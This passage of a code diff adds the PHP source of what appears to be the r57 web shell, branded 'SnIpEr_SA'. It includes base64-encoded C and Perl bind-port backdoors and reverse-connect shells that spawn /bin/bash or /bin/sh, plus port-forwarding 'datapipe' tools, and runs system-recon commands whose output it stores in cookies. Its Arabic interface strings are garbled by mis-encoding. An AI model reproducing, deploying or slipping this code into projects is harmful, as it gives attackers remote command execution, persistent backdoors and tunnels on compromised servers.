+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
+echo (($safe_mode)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ãÇí Óßá: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>İÚÇá</font>"; } else { echo "<font color=red>ÛíÑ İÚÇá</font>"; }
+echo "</b>".ws(2);
+echo "Çã ÇÓ Óßá: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÈæÓÊ ŞÑí Óßá: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÇæÑÇßá: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ãÛáŞ</font>";}
+echo "</b><br>".ws(2);
+echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
